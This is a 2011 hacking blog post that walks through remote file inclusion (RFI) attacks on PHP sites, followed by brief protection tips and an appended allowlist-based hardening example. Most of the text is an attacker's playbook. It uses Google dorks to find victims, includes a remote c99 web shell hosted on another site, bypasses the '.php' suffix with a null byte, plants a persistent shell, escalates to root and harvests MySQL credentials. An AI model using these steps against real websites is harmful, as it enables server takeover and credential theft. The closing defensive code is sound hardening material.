
Thursday 10 November 2011

RFI Attack Full Tutorial (By Ankit)

In this post I will show how RFI-vulnerable websites are exploited. Read the steps carefully and share the post if you like it. But first you should know what RFI is; click here to read the article.

1. The first thing you need is to find a website that gets its pages via the PHP include() function and is vulnerable to RFI. You can use Google dorks to locate servers vulnerable to RFI. Google dorking is the act of using Google's provided search tools to help get a specific search result.
2. Websites that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName
3. To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like the following:
http://target-site.com/index.php?page=http://google.com
4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.
5. A couple of the most popular shells are c99 and r57. One would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find a shell, the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL, make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?
6. Sometimes the PHP script on the server appends ".php" to the end of every included file. So if you included the shell, it would end up looking like "c99.txt.php" and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.
7. In step 1, I told you that you can use Google dorks to look for sites possibly vulnerable to RFI. An example of a Google dork would be: allinurl:.php?page=. This looks for URLs with .php?page= in them.
8. If you succeed in getting the server to parse the shell, you will be presented with a screen similar to the following, as I got it:
 

9. The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell, but this time remember to use a .php file so that in case the vulnerability is fixed, you will be able to access it later on.
10. Next, one will try to find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server.
You can also search the victim server for configuration files which may contain the username and password for the MySQL database.

How to Protect Yourself From RFI Attacks:

1. Make sure you are using up-to-date scripts.
2. Make sure your server's php.ini file has register_globals and allow_url_fopen disabled.
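
The include() pattern described in the steps above, next to a hardened form, as an added example that is not code from the original post. The page names, the pages/ directory and the helper function names are assumptions, and allow_url_include is a php.ini directive the post does not mention.

```php
<?php
// Added example, not from the original post. Page names and pages/ directory are hypothetical.
//
// Vulnerable pattern the steps above rely on (request value reaches include() unchecked):
//     include($_GET['page'] . '.php');
//
// php.ini settings to pair with the code below:
//     allow_url_fopen   = Off   ; named in the post
//     allow_url_include = Off   ; not in the post: controls URLs in include()/require()

// Allowlist: the request value is only ever a lookup key, never part of a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/** Return the local file for a requested page, or null if it is not allowlisted. */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x), URLs, "../" sequences and null bytes are never valid keys.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

/** True if php.ini still lets include() fetch remote URLs. */
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remote_include_enabled()) {
    error_log('allow_url_include is On; set it to Off in php.ini');
    http_response_code(500);
    exit;
}

$file = resolve_page($_GET['page'] ?? 'home');
if ($file === null) {
    // Log the rejected value (JSON-encoded so control characters cannot forge log lines).
    error_log('Rejected page parameter: ' . json_encode($_GET['page'] ?? null, JSON_PARTIAL_OUTPUT_ON_ERROR));
    http_response_code(404);
    exit('Page not found');
}

include $file;
```

The rejected-parameter log lines double as a detection signal: a page value containing "http://" or ending in ".txt?" is a probe of the kind described in steps 3 to 5.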
 
